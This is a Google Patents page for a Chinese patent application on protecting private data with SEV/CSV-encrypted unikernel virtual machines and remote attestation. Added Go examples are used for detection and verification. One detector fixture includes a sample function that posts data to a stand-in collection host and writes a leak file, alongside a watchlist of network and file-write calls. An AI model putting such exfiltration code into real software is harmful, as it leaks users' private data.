CN116975912A - Private data protection system, method, device and readable storage medium - Google Patents

Info

Publication number
CN116975912A
Authority
CN
China
Prior art keywords
target application
private data
data protection
application program
module
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202310917847.5A
Other languages
Chinese (zh)
Inventor
孟庆树
彭修杰
陈志军
周晶
董逢华
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Wuhan Tianyu Information Industry Co Ltd
Original Assignee
Wuhan Tianyu Information Industry Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Wuhan Tianyu Information Industry Co Ltd
Priority to CN202310917847.5A
Publication of CN116975912A
Legal status: Pending

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/60Protecting data
    • G06F21/62Protecting access to data via a platform, e.g. using keys or access control rules
    • G06F21/6218Protecting access to data via a platform, e.g. using keys or access control rules to a system of files or objects, e.g. local or distributed file system or database
    • G06F21/6245Protecting personal data, e.g. for financial or medical purposes
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/52Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity ; Preventing unwanted data erasure; Buffer overflow
    • G06F21/53Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity ; Preventing unwanted data erasure; Buffer overflow by executing in a restricted environment, e.g. sandbox or secure virtual machine
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/57Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
    • G06F21/572Secure firmware programming, e.g. of basic input output system [BIOS]
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/60Protecting data
    • G06F21/602Providing cryptographic facilities or services
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F8/00Arrangements for software engineering
    • G06F8/60Software deployment
    • G06F8/61Installation
    • G06F8/63Image based installation; Cloning; Build to order
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F9/00Arrangements for program control, e.g. control units
    • G06F9/06Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
    • G06F9/44Arrangements for executing specific programs
    • G06F9/455Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines
    • G06F9/45533Hypervisors; Virtual machine monitors
    • G06F9/45558Hypervisor-specific management and integration aspects
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F9/00Arrangements for program control, e.g. control units
    • G06F9/06Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
    • G06F9/44Arrangements for executing specific programs
    • G06F9/455Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines
    • G06F9/45533Hypervisors; Virtual machine monitors
    • G06F9/45558Hypervisor-specific management and integration aspects
    • G06F2009/45587Isolation or security of virtual machine instances

Landscapes

  • Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Software Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • General Physics & Mathematics (AREA)
  • Physics & Mathematics (AREA)
  • Computer Hardware Design (AREA)
  • Health & Medical Sciences (AREA)
  • General Health & Medical Sciences (AREA)
  • Bioethics (AREA)
  • Databases & Information Systems (AREA)
  • Medical Informatics (AREA)
  • Storage Device Security (AREA)

Abstract

The invention provides a private data protection system, method, device and readable storage medium. The packaging module packages the target application, the libraries it depends on and the system calls it needs into an image file, and the image file is used as the running software of a virtual machine. The security firmware encrypts and decrypts the memory of the virtual machine, performs an integrity measurement of the image file, and starts the virtual machine only if the measurement passes. The acquisition module is built into the target application; it obtains a remote report from the security firmware and sends it to the first checking module, where the remote report is generated by the security firmware and contains the measurement value of the image file. The first checking module checks the measurement value in the remote report, so that the data provider provides private data to the target application only after the check passes. The invention satisfies the security requirement of the private data and the efficiency requirement of the execution process at the same time.

Description

Private data protection system, method, device and readable storage medium
Technical Field
The present invention relates to the field of information security technologies, and in particular, to a system, a method, an apparatus, and a readable storage medium for protecting private data.
Background
Privacy-preserving computation has three main technical routes: secure multi-party computation, federated learning and Trusted Execution Environments (TEE). The TEE-based route has attracted attention from industry and academia because of its high efficiency, its support for arbitrary computation logic, and its real-world deployments. However, existing TEE schemes for privacy-computing scenarios suffer either from data leakage or from poor execution efficiency, and cannot meet the security requirement of the private data and the efficiency requirement of the execution process at the same time.
Disclosure of Invention
The main purpose of the invention is to provide a private data protection system, method, device and readable storage medium that solve the technical problem that TEE schemes for privacy-computing scenarios in the related art cannot meet the security requirement of the private data and the efficiency requirement of the execution process at the same time.
In a first aspect, the present invention provides a private data protection system comprising a packaging module, a virtual machine, a secure firmware, an acquisition module and a first checking module;
the packaging module packages the target application, the libraries it depends on and the system calls it needs into an image file, and the image file is used as the running software of the virtual machine;
the secure firmware is located in the CPU of the host machine and encrypts and decrypts the memory of the virtual machine, performs an integrity measurement of the image file, and starts the virtual machine only if the measurement passes;
the acquisition module is built into the target application and obtains a remote report from the secure firmware and sends it to the first checking module, where the remote report is generated by the secure firmware and contains the measurement value of the image file;
the first checking module checks the measurement value in the remote report, so that the data provider provides private data to the target application only after the measurement value check passes.
Further, in an embodiment, the private data protection system further includes a second checking module;
the second checking module checks the functions of the source code of the target application and of the libraries and system calls it depends on before the target application is packaged, and outputs an alarm prompt if it finds an anomalous network-call function or an anomalous file-write function in the source code.
Further, in an embodiment, the first checking module is further configured to, after the measurement value check passes, determine from the measurement value the source code of the target application and of the libraries and system calls it depends on, and to check the functions of that source code, so that the data provider provides private data to the target application only after the source code function check also passes.
Further, in an embodiment, the secure firmware is further configured to sign a target data structure that contains the measurement value, and the remote report further contains the signature;
the acquisition module is further configured to check the signature in the remote report and, only if the signature check passes, to send the remote report to the first checking module.
Further, in an embodiment, the private data protection system further includes an encrypted data disk;
the encrypted data disk stores in encrypted form the data that the target application needs to persist while running, where the key is bound to a system state and is valid only when the current state of the system matches the system state at the time the key was bound.
Further, in an embodiment, the packaging module compiles the target application against a library operating system to form a unikernel image.
Further, in an embodiment, the secure firmware performs the integrity measurement of the image file and encrypts and decrypts the memory of the virtual machine based on AMD SEV technology or Hygon CSV technology.
In a second aspect, the present invention further provides a private data protection method, applied to a private data protection system comprising a packaging module, a virtual machine, a secure firmware, an acquisition module and a first checking module, where the private data protection method comprises:
the packaging module packages the target application, the libraries it depends on and the system calls it needs into an image file, where the image file is used as the running software of the virtual machine;
the secure firmware encrypts and decrypts the memory of the virtual machine, performs an integrity measurement of the image file, and starts the virtual machine only if the measurement passes, where the secure firmware is located in the CPU of the host machine;
the acquisition module obtains a remote report from the secure firmware and sends it to the first checking module, where the acquisition module is built into the target application and the remote report is generated by the secure firmware and contains the measurement value of the image file;
the first checking module checks the measurement value in the remote report, so that the data provider provides private data to the target application only after the measurement value check passes.
In a third aspect, the present invention also provides a private data protection apparatus, the private data protection apparatus including a processor, a memory, and a private data protection program stored on the memory and executable by the processor, wherein the private data protection program, when executed by the processor, implements the steps of the above-described private data protection method.
In a fourth aspect, the present invention further provides a readable storage medium having stored thereon a privacy data protecting program, wherein the privacy data protecting program, when executed by a processor, implements the steps of the above-described privacy data protecting method.
The invention provides multiple guarantees during the use of the target application. The target application, the libraries it depends on and the system calls it needs are packaged into an image file that serves as the running software of the virtual machine, so system calls execute directly inside the virtual machine alongside the target application; this avoids the data leakage caused by executing system calls outside the TEE, and ensures that the target application cannot be accessed by any other entity from inside the virtual machine. The secure firmware performs an integrity measurement of the image file; the measurement value both confirms the integrity of the image file when the virtual machine is started and proves the trustworthiness of the application's running environment to the data provider. The secure firmware encrypts and decrypts the memory of the virtual machine, so that neither the host machine nor other virtual machines can access the memory of the virtual machine, which blocks attacks from outside the virtual machine. In addition, the invention does not rely on instruction emulation and does not require the virtual machine kernel to be modified and recompiled for each application, so it fully exploits the efficiency of the virtual-machine technical route. The invention therefore meets the security requirement of the private data and the efficiency requirement of the execution process at the same time.
Drawings
FIG. 1 is a schematic diagram of a private data protection system according to an embodiment of the invention;
FIG. 2 is a schematic diagram of a private data protection system according to another embodiment of the present invention;
FIG. 3 is a flowchart illustrating a method for protecting private data according to an embodiment of the present invention;
fig. 4 is a schematic hardware structure of a private data protection device according to an embodiment of the invention.
The achievement of the objects, functional features and advantages of the present invention will be further described with reference to the accompanying drawings, in conjunction with the embodiments.
Detailed Description
It should be understood that the specific embodiments described herein are for purposes of illustration only and are not intended to limit the scope of the invention.
The inventors studied the security threats to current TEE schemes for privacy-computing scenarios and analysed the problems of each scheme, as follows.
Intel introduced a TEE scheme based on SGX enclaves that protects the confidentiality and integrity of application code and data and provides application-level isolation. However, the execution efficiency of the SGX scheme is lower: according to the best published test data for Occlum, the library operating system that currently supports SGX enclave application development, the performance loss on a computing task is 3 to 6 times. Intel SGX enclaves also have the constraint that system calls cannot be executed directly, for example input/output-related and file-system-related system calls. An enclave can execute such system calls only outside the enclave through the OCALL mechanism. This causes data leakage in privacy-computing scenarios; for example, in a data-annotation scenario, the system call that outputs annotated data to the screen causes that data to leave the enclave.
AMD has proposed a TEE scheme based on SEV. Compared with Intel SGX enclaves it has little performance loss, high execution efficiency, and easy application development and porting. SEV is mainly aimed at cloud computing scenarios, and security issues arise when it is used to process private data. SEV encrypts and isolates memory at virtual-machine granularity, so that the host machine or other virtual machines cannot access the memory of the target virtual machine, which protects the data of the cloud tenant inside the SEV virtual machine. When SEV is used in a privacy-computing scenario, however, the programs inside the virtual machine are not isolated from one another, so the owner of the SEV virtual machine has many means of attack, the user data in the TEE is no longer secure, and data leakage results.
Similarly, because the ARM TEE allows multiple applications to run simultaneously, a target application inside the TEE is also exposed to attacks from other applications inside the TEE.
Addressing the problem of application protection based on virtual machines, a German research team designed the SEVGuard system in 2019 for application confidentiality. It calls the host's KVM API directly to construct a very small virtual machine, encrypts the virtual machine's memory using the memory encryption function of SEV, and runs the target application inside that virtual machine to protect it; the system calls the application needs are provided by the host system.
In 2020, a Shanghai Jiao Tong University research team designed the Enclavisor system, a guest OS for SEV virtual machines based on hardware-software co-design, which constructs, manages and schedules isolated enclaves inside the SEV-encrypted virtual machine, so that a security-sensitive target application runs inside an enclave and is isolated and protected; the system calls the target application needs are provided by an external ordinary virtual machine.
Both SEVGuard and Enclavisor protect applications well in a cloud environment, where other programs cannot obtain private data from the system. In a privacy-computing scenario, however, the data provider trusts no entity, including the owner of the application; this is a new threat model the inventors identified for privacy computing. Under this threat model, the external system that executes the dynamic link libraries or system calls is also untrusted, because a malicious ordinary virtual machine (which executes the system calls in Enclavisor) or a malicious host system (which runs SEVGuard) can infer information about the original data from the parameters passed in each library call or system call.
In 2022, a research team from Ohio State University and the Southern University of Science and Technology proposed the vSGX system, which designs a virtual SGX directly on top of SEV. It achieves application-level isolation, but its efficiency is relatively reduced, and it also inherits the data leakage caused by executing system calls outside the enclave that exists in Intel SGX enclaves.
In 2023, a research team proposed protecting the system environment and the application environment in which the target application runs in order to protect the target application; the problem with this scheme is that when SEV runs different applications, the operating-system kernel must be modified and compiled again, which affects execution efficiency.
Therefore, existing TEE schemes for privacy-computing scenarios suffer from data leakage or poor execution efficiency, and cannot meet the security requirement of the private data and the efficiency requirement of the execution process at the same time.
In order to solve the above technical problems in the related art, the present invention provides a system, a method, a device and a readable storage medium for protecting private data, which simultaneously satisfy the security requirement of the private data and the efficiency requirement of the execution process.
In a first aspect, an embodiment of the present invention provides a private data protection system.
Fig. 1 is a schematic diagram illustrating a configuration of a private data protection system according to an embodiment of the present invention, and fig. 2 is a schematic diagram illustrating a configuration of a private data protection system according to another embodiment of the present invention.
Referring to fig. 1 and 2, in one embodiment the private data protection system comprises a packaging module, a virtual machine, a secure firmware, an acquisition module and a first checking module. The packaging module packages the target application, the libraries it depends on and the system calls it needs into an image file, and the image file is used as the running software of the virtual machine. The secure firmware is located in the CPU of the host machine; it encrypts and decrypts the memory of the virtual machine, performs an integrity measurement of the image file, and starts the virtual machine only if the measurement passes. The acquisition module is built into the target application; it obtains a remote report from the secure firmware and sends it to the first checking module, where the remote report is generated by the secure firmware and contains the measurement value of the image file. The first checking module checks the measurement value in the remote report, so that the data provider provides private data to the target application only after the measurement value check passes.
Specifically, the private data protection system of this embodiment involves three kinds of user in a privacy-computing scenario: the application developer, the application user and the data provider. The target application is an application in a privacy-computing scenario whose execution involves the use of private data. The application developer packages the target application, the libraries it depends on and the system calls it needs into an image file through the packaging module and delivers the image file to the application user. The application user runs the image file as the software of the virtual machine; the secure firmware in the host CPU encrypts and decrypts the memory of the virtual machine and measures the integrity of the image file. The data provider requests a remote report from the secure firmware through the acquisition module inside the target application; the secure firmware generates a remote report containing the measurement value of the image file in response; the first checking module checks the measurement value in the remote report; and the data provider supplies private data to the application user only after the measurement value check passes.
This embodiment therefore provides multiple guarantees during the use of the target application. Packaging the target application, the libraries it depends on and the system calls it needs into an image file that serves as the running software of the virtual machine lets system calls execute directly inside the virtual machine alongside the target application, which avoids the data leakage caused by executing system calls outside the TEE and ensures that the target application cannot be accessed by any other entity from inside the virtual machine. The integrity measurement of the image file by the secure firmware confirms the integrity of the image file when the virtual machine is started and proves the trustworthiness of the application's running environment to the data provider. Memory encryption and decryption by the secure firmware prevents the host machine or other virtual machines from accessing the memory of the virtual machine, which blocks attacks from outside the virtual machine. In addition, this embodiment does not rely on instruction emulation and does not require the virtual machine kernel to be modified and recompiled for each application, so it fully exploits the efficiency of the virtual-machine technical route. This embodiment therefore meets the security requirement of the private data and the efficiency requirement of the execution process at the same time.
Optionally, the private data protection scheme of the invention may be combined with other techniques to protect private data in specific privacy-computing scenarios. For example, in data annotation for AI training services, the annotation application aggregates data from different parties, each of which needs its data kept private. Applying this scheme to data annotation prevents the annotated data from being leaked directly. The remaining problem of visual leakage (data shown on screen being read by a person) can be addressed with techniques such as anti-photographing measures.
With continued reference to fig. 2, in a further embodiment the private data protection system further comprises a second checking module. The second checking module checks the functions of the source code of the target application and of the libraries and system calls it depends on before the target application is packaged, and outputs an alarm prompt if it finds an anomalous network-call function or an anomalous file-write function in the source code.
In this embodiment the second checking module is added to address the enlarged attack surface that results from bringing all dependency libraries and system calls into the TEE. Before packaging, the application developer runs a function check over the source code of the target application and of the libraries and system calls it depends on through the second checking module, so that the functionality of the target application matches what is expected; only after the check passes is the image file generated by the packaging module. In particular, network-call functions are checked to ensure they are not used to send unexpected data, which prevents data leakage through an unexpected channel, and file-write functions are checked to ensure they are not used to store data maliciously or illegitimately. If an anomalous network-call function or file-write function is found in the source code, an alarm prompt is output to remind the application developer to take corrective action. Optionally, the network-function and file-write-function checks may be implemented by keyword matching, with the keywords chosen according to the programming language and toolchain used for the application.
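The following is an added example of the second checking module's function check, written for this page; it is not code from the patent or its assignee. It assumes the target application is written in Go and, instead of plain keyword matching, walks the parsed syntax tree so that only real call sites of watchlisted functions are reported. The watchlist of network and file-write functions, the sample annotation program, and the "ALARM" output format are assumptions constructed for the example.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
)

// Finding is one call the second checking module would flag.
type Finding struct {
	Line     int
	Callee   string // package-qualified name, e.g. "net.Dial"
	Category string // "network" or "file-write"
}

// watchlist names package-qualified functions through which data can leave
// the virtual machine. The list is an assumption chosen for this example.
var watchlist = map[string]string{
	"net.Dial":        "network",
	"net.DialTimeout": "network",
	"net.Listen":      "network",
	"http.Get":        "network",
	"http.Post":       "network",
	"http.NewRequest": "network",
	"os.Create":       "file-write",
	"os.OpenFile":     "file-write",
	"os.WriteFile":    "file-write",
}

// CheckSource parses one Go source file and returns every call to a
// watchlisted function, in source order. An empty result means the file has
// no network or file-write call the reviewer did not already expect.
func CheckSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var findings []Finding
	ast.Inspect(file, func(n ast.Node) bool {
		call, ok := n.(*ast.CallExpr)
		if !ok {
			return true
		}
		sel, ok := call.Fun.(*ast.SelectorExpr)
		if !ok {
			return true
		}
		pkg, ok := sel.X.(*ast.Ident)
		if !ok {
			return true
		}
		name := pkg.Name + "." + sel.Sel.Name
		if cat, listed := watchlist[name]; listed {
			findings = append(findings, Finding{
				Line:     fset.Position(call.Pos()).Line,
				Callee:   name,
				Category: cat,
			})
		}
		return true
	})
	return findings, nil
}

// sampleSource is a constructed annotation program: label is the expected
// behaviour, exfil is the kind of function the check exists to catch.
const sampleSource = `package annotate

import (
	"net/http"
	"os"
	"strings"
)

func label(record string) string { return strings.ToUpper(record) }

func exfil(record string) {
	http.Post("https://example.invalid/collect", "text/plain", strings.NewReader(record))
	os.WriteFile("/tmp/leak.txt", []byte(record), 0o600)
}
`

func main() {
	findings, err := CheckSource("annotate.go", sampleSource)
	if err != nil {
		panic(err)
	}
	if len(findings) == 0 {
		fmt.Println("check passed: no unexpected network or file-write calls")
		return
	}
	for _, f := range findings {
		fmt.Printf("ALARM annotate.go:%d %s (%s)\n", f.Line, f.Callee, f.Category)
	}
}
```

Run against the constructed sample it reports the http.Post and os.WriteFile calls in exfil and nothing in label. A syntax-tree walk avoids the false positives a keyword grep produces on comments and string literals, but it still only sees direct package-qualified calls; a real check would also resolve aliased imports and wrapper functions.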
Further, in an embodiment, the first checking module is further configured to, after the measurement value check passes, determine from the measurement value the source code of the target application and of the libraries and system calls it depends on, and to check the functions of that source code, so that the data provider provides private data to the target application only after the source code function check also passes.
In this embodiment, because no trusted third party exists, a source code checking function is added to the first checking module to further improve the security of the private data. Before providing private data, the data provider first checks the measurement value; after that check passes, it determines the corresponding target application from the measurement value and checks its source code to ensure that the functions (especially the network-call and file-write functions) match what is expected, and only after the source code function check passes does it provide the private data to the target application. Note that, for this to be possible, the target application must be made available in source form to the data provider.
Further, in one embodiment, the secure firmware is further configured to sign a target data structure that contains the measurement value of the image file, and the remote report further contains the signature. The acquisition module is further configured to check the signature in the remote report and, only if the signature check passes, to send the remote report to the first checking module.
In this embodiment the target data structure may contain, besides the measurement value, a chip ID, an externally supplied random number (nonce) and similar fields. The acquisition module must check the signature before forwarding the remote report, to confirm that it comes from a trusted hardware platform. Specifically, the secure firmware signs the target data structure with the Platform Endorsement Key (PEK), which represents the identity of the TEE platform; the acquisition module checks the signature in the remote report with the public key from the PEK's public key certificate, and verifies the validity of that certificate through its certificate chain.
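The report generation and the two checks described above, as an added example written for this page rather than code from the patent, AMD SEV or Hygon CSV. It assumes a report layout of measurement, chip ID and nonce signed with an Ed25519 PEK, and a SHA-256 image measurement; the real firmware formats and algorithms are not given on this page. Certificate-chain validation of the PEK is represented here by handing the verifier the endorsed public key directly.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Report is the target data structure the secure firmware signs: the image
// measurement, a chip identity and a nonce supplied by the requester, plus
// the signature over those three fields. The exact layout is an assumption.
type Report struct {
	Measurement [32]byte
	ChipID      [16]byte
	Nonce       [32]byte
	Signature   []byte
}

// Firmware stands in for the secure firmware in the host CPU. It holds the
// platform endorsement key (PEK) and the measurement it took of the image
// before starting the virtual machine.
type Firmware struct {
	pek         ed25519.PrivateKey
	measurement [32]byte
	chipID      [16]byte
}

// Measure is the integrity measurement of an image file (SHA-256 here).
func Measure(image []byte) [32]byte { return sha256.Sum256(image) }

// NewFirmware generates a fresh PEK and measures the image at launch.
func NewFirmware(image []byte, chipID [16]byte) (*Firmware, error) {
	_, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Firmware{pek: priv, measurement: Measure(image), chipID: chipID}, nil
}

// PEKPublic is the key a vendor certificate chain would endorse; the
// acquisition module obtains it from that chain, not from the report.
func (f *Firmware) PEKPublic() ed25519.PublicKey {
	return f.pek.Public().(ed25519.PublicKey)
}

// signedBytes is the byte string the signature covers.
func signedBytes(r *Report) []byte {
	var b bytes.Buffer
	b.Write(r.Measurement[:])
	b.Write(r.ChipID[:])
	b.Write(r.Nonce[:])
	return b.Bytes()
}

// GenerateReport answers a request from the acquisition module. Binding the
// requester's nonce into the signed data stops an old report being replayed.
func (f *Firmware) GenerateReport(nonce [32]byte) *Report {
	r := &Report{Measurement: f.measurement, ChipID: f.chipID, Nonce: nonce}
	r.Signature = ed25519.Sign(f.pek, signedBytes(r))
	return r
}

// VerifyReport performs both checks: the signature check the acquisition
// module does against the endorsed PEK, and the measurement check the first
// checking module does against the value the data provider expects for the
// reviewed image. It also rejects a report whose nonce is not the one sent.
func VerifyReport(r *Report, pekPub ed25519.PublicKey, expected [32]byte, sentNonce [32]byte) error {
	if !ed25519.Verify(pekPub, signedBytes(r), r.Signature) {
		return errors.New("signature invalid: report is not from the endorsed platform")
	}
	if r.Nonce != sentNonce {
		return errors.New("nonce mismatch: report may be replayed")
	}
	if r.Measurement != expected {
		return errors.New("measurement mismatch: running image differs from the reviewed build")
	}
	return nil
}

func main() {
	image := []byte("constructed unikernel image bytes") // stand-in for the image file
	var chip [16]byte
	copy(chip[:], "chip-0001")
	fw, err := NewFirmware(image, chip)
	if err != nil {
		panic(err)
	}
	var nonce [32]byte
	if _, err := rand.Read(nonce[:]); err != nil {
		panic(err)
	}
	rep := fw.GenerateReport(nonce)
	fmt.Println("genuine image:", VerifyReport(rep, fw.PEKPublic(), Measure(image), nonce))
	fmt.Println("modified image:", VerifyReport(rep, fw.PEKPublic(), Measure([]byte("modified image")), nonce))
}
```

The order of the checks matters: the signature is verified first so that nothing else in the report is trusted until it is known to come from the platform, and the data provider's own nonce is compared before the measurement so that a genuine but stale report for an earlier launch is not accepted.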
Further, in an embodiment, the private data protection system further comprises an encrypted data disk. The encrypted data disk stores in encrypted form the data that the target application needs to persist while running, where the key is bound to a system state and is valid only when the current state of the system matches the system state at the time the key was bound. Encryption and decryption with the key are therefore possible only when the current state of the system matches the state at binding time, which further protects the data.
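An added example of binding the disk key to the system state, written for this page and not taken from the patent. It assumes the state is the launch measurement of the image, that the firmware holds a per-platform secret, and that the key is derived with HMAC-SHA256 and used with AES-256-GCM; none of those choices is specified on this page. A block sealed under one measurement cannot be opened with the key derived under another, which is the "key is valid only when the state matches" property.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// DeriveDiskKey binds the disk key to the system state. The key is
// HMAC-SHA256 over the launch measurement under a platform secret that only
// the firmware holds, so a different measurement (a modified image) yields a
// different key and a disk written under the old state cannot be opened.
// Using HMAC as the key derivation function is an assumption for this example.
func DeriveDiskKey(platformSecret []byte, measurement [32]byte) []byte {
	mac := hmac.New(sha256.New, platformSecret)
	mac.Write([]byte("encrypted-data-disk-key-v1")) // domain-separation label
	mac.Write(measurement[:])
	return mac.Sum(nil) // 32 bytes: an AES-256 key
}

// SealBlock encrypts one disk block with AES-256-GCM; the random nonce is
// stored in front of the ciphertext.
func SealBlock(key, plaintext []byte) ([]byte, error) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(blk)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// UnsealBlock decrypts a block; it fails with an authentication error when
// the key was derived under a different system state.
func UnsealBlock(key, sealed []byte) ([]byte, error) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(blk)
	if err != nil {
		return nil, err
	}
	if len(sealed) < gcm.NonceSize() {
		return nil, errors.New("sealed block too short")
	}
	nonce, ct := sealed[:gcm.NonceSize()], sealed[gcm.NonceSize():]
	pt, err := gcm.Open(nil, nonce, ct, nil)
	if err != nil {
		return nil, errors.New("open failed: key does not match the state the block was sealed under")
	}
	return pt, nil
}

func main() {
	platformSecret := []byte("constructed platform secret, never leaves firmware")
	reviewed := sha256.Sum256([]byte("reviewed unikernel image"))
	modified := sha256.Sum256([]byte("modified unikernel image"))

	sealed, err := SealBlock(DeriveDiskKey(platformSecret, reviewed), []byte("annotation record 42"))
	if err != nil {
		panic(err)
	}
	_, err = UnsealBlock(DeriveDiskKey(platformSecret, reviewed), sealed)
	fmt.Println("same state:", err)
	_, err = UnsealBlock(DeriveDiskKey(platformSecret, modified), sealed)
	fmt.Println("changed state:", err)
}
```

Because GCM authenticates the ciphertext, a wrong key is detected rather than silently producing garbage, which is what a persisted disk needs: an attacker who replaces the image and restarts the virtual machine gets a different key and an authentication failure, not the previous run's data.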
Further, in one embodiment, the packaging module compiles the target application based on the library operating system to form an unikernel image. The library operating system (LibOS) based technology ensures that only one application exists in the unikernel mirror image, thereby achieving the purpose of application isolation. LibOS provides the functions of dependency libraries, system calls, etc. required by the application. In other embodiments, the RTOS and related applications may also be made as image files.
Further, in an embodiment, the security firmware performs integrity measurement on the image file and encrypts and decrypts the memory of the virtual machine based on the amdev technology or the marine CSV technology.
In this embodiment, the privacy data protection system uses the CPU architecture provided by the amdev technology or the marine CSV technology, where firmware in the CPU can perform integrity measurement on the image file and encrypt and decrypt the memory of the virtual machine, and on this basis, add a remote report generating function, so as to obtain the security firmware and the virtual machine required in the present invention. Of course, in other embodiments, firmware having the above functions may be rearranged based on an existing CPU architecture. The firmware can produce symmetric keys and asymmetric keys, and is added with a symmetric password execution engine, and the firmware automatically encrypts and decrypts the memory of the virtual machine so as to prevent attacks from a host and other virtual machines, and simultaneously, the attacks of an attacker on an application by utilizing a dynamic link library and loopholes of a system call function can be reduced.
In a second aspect, an embodiment of the present invention further provides a method for protecting private data, which is applied to a private data protection system including a packaging module, a virtual machine, a secure firmware, an obtaining module, and a first checking module.
Fig. 3 is a flow chart illustrating a method for protecting private data according to an embodiment of the invention.
Referring to fig. 3, in one embodiment, the method for protecting private data includes:
S11: the packaging module packages the target application program and the libraries and system calls on which the target application program depends into an image file, where the image file serves as the running software of the virtual machine;
S12: the secure firmware encrypts and decrypts the memory of the virtual machine, performs integrity measurement on the image file, and starts the virtual machine if the measurement passes, where the secure firmware is arranged in the CPU of the host machine;
S13: the acquisition module acquires a remote report from the secure firmware and sends it to the first checking module, where the acquisition module is arranged in the target application program and the remote report is generated by the secure firmware and contains the measurement value of the image file;
S14: the first checking module checks the measurement value in the remote report, so that the data provider can provide private data to the target application program after the measurement value passes the check.
Further, in an embodiment, the private data protection system further includes a second checking module;
before the step in which the packaging module packages the target application program and the libraries and system calls on which it depends into the image file, the method further comprises:
the second checking module checks the functions of the source code corresponding to the target application program and the libraries and system calls on which it depends, and outputs an alarm prompt if it finds the network calling function of the source code to be abnormal or the file writing function to be abnormal.
Further, in an embodiment, after the step of checking the metric value in the remote report by the first checking module, the method further includes:
the first checking module determines, from the measurement value, the target application program and the libraries and system calls on which it depends, retrieves the corresponding source code and checks its functions, so that the data provider can provide private data to the target application program after the source code function check passes.
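The source code check described above (the second checking module before packaging, and the first checking module after the measurement value passes) is, in substance, a static scan of the target application's source for network calling and file writing functions that the data provider did not expect. The following is an added example, not code from the patent or its applicant, showing one way to carry out such a check for a target application written in Go: the Go parser walks the source, every call into a table of network and file-writing entry points is recorded, and any recorded call outside the list the data provider agreed to produces an alarm prompt. The sensitive-call table, the allow-list and the sample source are assumptions constructed for the example.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
)

// Finding is one flagged call site: the capability it exercises and where it is.
type Finding struct {
	Kind string // "network" or "file-write"
	Call string // package-qualified callee, e.g. "net.Dial"
	Line int
}

// sensitiveCalls maps package-qualified callees to the capability they use.
// This table is an assumption for the example; a real checker would carry the
// complete list of network and file-writing entry points of the LibOS.
var sensitiveCalls = map[string]string{
	"net.Dial":        "network",
	"net.DialTimeout": "network",
	"net.Listen":      "network",
	"http.Get":        "network",
	"http.Post":       "network",
	"os.Create":       "file-write",
	"os.WriteFile":    "file-write",
	"os.OpenFile":     "file-write",
}

// CheckSource parses Go source text and returns every call into the sensitive
// set, in source order. Deciding which of them are expected is left to Alarms.
func CheckSource(src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, "target.go", src, 0)
	if err != nil {
		return nil, err
	}
	var out []Finding
	ast.Inspect(f, func(n ast.Node) bool {
		call, ok := n.(*ast.CallExpr)
		if !ok {
			return true
		}
		sel, ok := call.Fun.(*ast.SelectorExpr)
		if !ok {
			return true
		}
		pkg, ok := sel.X.(*ast.Ident) // only pkg.Func selectors, not obj.Method
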